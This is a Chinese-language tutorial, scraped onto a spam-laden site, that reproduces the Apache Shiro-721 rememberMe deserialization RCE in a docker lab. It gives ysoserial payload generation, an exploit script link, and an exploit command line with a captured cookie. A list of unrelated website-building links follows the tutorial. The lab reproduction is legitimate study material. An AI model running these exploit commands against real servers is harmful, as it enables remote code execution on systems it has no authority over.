当前位置: 首页 > news >正文

搜索引擎网站入口上海网站制作网站开发

搜索引擎网站入口,上海网站制作网站开发,网站后台不能上传图片,在上阿里云做网站漏洞原理 Shiro rememberMe 反序列化远程代码执行漏洞 由于 Apache Shiro cookie 中通过 AES-128-CBC 模式加密的 rememberMe 字段存 在问题,用户可通过 Padding Oracle 加密生成的攻击代码来构造恶意的 rememberMe 字段,并重新请求网站,进…

漏洞原理

Shiro rememberMe 反序列化远程代码执行漏洞

由于 Apache Shiro cookie 中通过 AES-128-CBC 模式加密的 rememberMe 字段存 在问题,用户可通过 Padding Oracle 加密生成的攻击代码来构造恶意的 rememberMe 字段,并重新请求网站,进行反序列化攻击,最终导致任意代码执行

rememberMe cookie 通过 AES-128-CBC 模式加密,易受到 Padding Oracle 攻击。可以通过结合有效的 rememberMe cookie 作为 Padding Oracle 攻击的前缀,然后精⼼制作 rememberMe 来进⾏反序列化攻击。

Tip:在1.2.4版本后,shiro已经更换 AES-CBC 为 AES-GCM ,无法再通过 Padding Oracle 遍历 key 。

影响版本

Apache Shiro <= 1.4.1(需要一个合法的登录账号,基于Padding Oracle attack来实现的攻击)

通过Padding Oracle Attack攻击可以实现破解AES-CBC加密过程进而实现rememberMe的内容伪造。下面会有单独的篇幅讲Padding Oracle Attack。

shiro-721对cookie中rememberMe的值的解析过程

在这里插入图片描述

特征判断

由于漏洞利用需要一个合法的登录账号,这里利用账号正常登陆获取一个有效的rememberMe cookie ,并记录下这个rememberMe的值

docker环境搭建

方法一:

git clone https://github.com/inspiringz/Shiro-721.git
cd Shiro-721/Docker
docker build -t shiro-721 .
docker run -p 8080:8080 -d shiro-721

方法二:

docker pull vulfocus/shiro-721docker run -d -p 8080:8080 vulfocus/shiro-721

漏洞复现

先使用合法账户登陆,记得勾选remember Me,然后使用burp抓包获取cookie:
在这里插入图片描述
获取到cookie:
在这里插入图片描述
将其中的remember Me字段复制下来输入到工具中进行利用:

使用ysoserial工具生成payload

java -jar ysoserial.jar CommonsBeanutils1 "touch /tmp/123" > payload.class
#"touch /tmp/123" 在tmp目录写入123

使用工具生成payload

脚本链接:https://github.com/wuppp/shiro_rce_exp python shiro_exp.py
http://192.168.88.130:8080 [rememberMeCookie] payload.class

python shiro_exp.py http://192.168.171.137:8080/login.jsp LIO2vKStP5R4NN+TLY0Bgfrz+3sacQHB1BfrOheCVAHeFAGtRsX9JW24tCvcedluOxZwFPoOSs7/tA0fK+UJ9ylRjLIT87NIN1smV22TVqdQ4vSJXB42IQCTV1mDA2CwlDpoeem6M4qY2SeB4JwIpV+iUwNJoOj+NfWeX3/lLZHkoCnsR5TCm6GrHyhdaDZYK0BAJNXFQ9658sJGAF1fztcfR0pYD9RtX26iLW73+D0pd3x6DhPQB7euA4uhUZ3Ue8RoOK3jTqxHC3U5n0DIMpc1RWlHVzUyHjejFAPXCReV+7ds/dWr+b5XlgP9/7ajmi2+6dqr2apVaIhEMC5SP4X4Y+QZw3wS6w76pD1vT8JSlG6l+h4+tIRuS4/gbUzX8GhmPCtw2MBMS/xZ2FsjvTPexdPLEf+114qo4152aNNcXul4zN3czLlve+otlqd5E/WyhhbBA2+EFk+Pewnsq2g2sS53s57H9BcWhXHkcwf0cIrkOXAn9a9xfkkm1HH9 payload.class

在这里插入图片描述

此 exp 爆破时间较长,建议使用 ysoserial 生成较短的 payload 验证(eg: ping 、 touch /tmp/success, etc),约 1 个多小时可生成正确的 rememberme cookie,生成成功后将自动停止运行。

在这里插入图片描述

最终会生成恶意的rememberMe cookie,我们使用这个cookie替换原数据包中的cookie。然后登陆进服务器看,会发现/tmp目录下被创建了一个123文件。

在这里插入图片描述

漏洞利用成功!

http://www.yayakq.cn/news/56475/

相关文章:

  • 阿里网站销量做不起来怎么办山西手机版建站系统开发
  • 怎么做网站滑动图片部分wordpress后台权限
  • 网站建设性意见表外贸网站建设智能建站
  • 鸿鹄网站建设网站如何实现qq登录功能
  • 免费在线图片编辑器网站优化课程
  • 免费家具网站模板国外代码开源网站
  • 网站运营管理教材入驻天猫商城的条件和费用
  • 外贸网站建设公司信息象山县城乡建设局网站
  • 有什么好看的网站原阳网站建设
  • 在线探测网站开发语言公司网站的留言板怎么做
  • 网络科技有限公司网站建设策划书社交网站开发用到的技术
  • wordpress 无法粘贴做网站优化两年遇到的SEO常态
  • 长春市建设工程造价管理协会网站商城类网站建设+数据库
  • 怎么样用手机做网站关键词如何修改wordpress模板栏目的属性
  • 厦门市建设局查询保障摇号网站长沙高端网站建设品牌
  • 成都农产品网站建设方案做游戏模板下载网站有哪些内容
  • 如何发布自己的html网站淘宝客网站建设详细教程
  • 网站内外链建设cpanel 安装wordpress
  • 网站建设观点知识普及莱州网站建设包年多少钱
  • 六年级做的网站的软件百度对网站的收录
  • 内网 做 网站创建网站平台要多少钱
  • 网站做问卷调查的问题装潢设计报价
  • 开展建设文明网站活动深圳网站建设啊
  • php网站平台网站开发的费用计入什么科目
  • 在哪建设网站建站软件排名
  • 安徽网站建设价格做网站跟app需要多少钱
  • 广告策划长春seo外包
  • 路桥建设网站网上花店网页制作代码
  • 网站建设自由容器是什么意思重庆市工程建设标准化网站
  • 手机网站 兼容wordpress 顶 踩 插件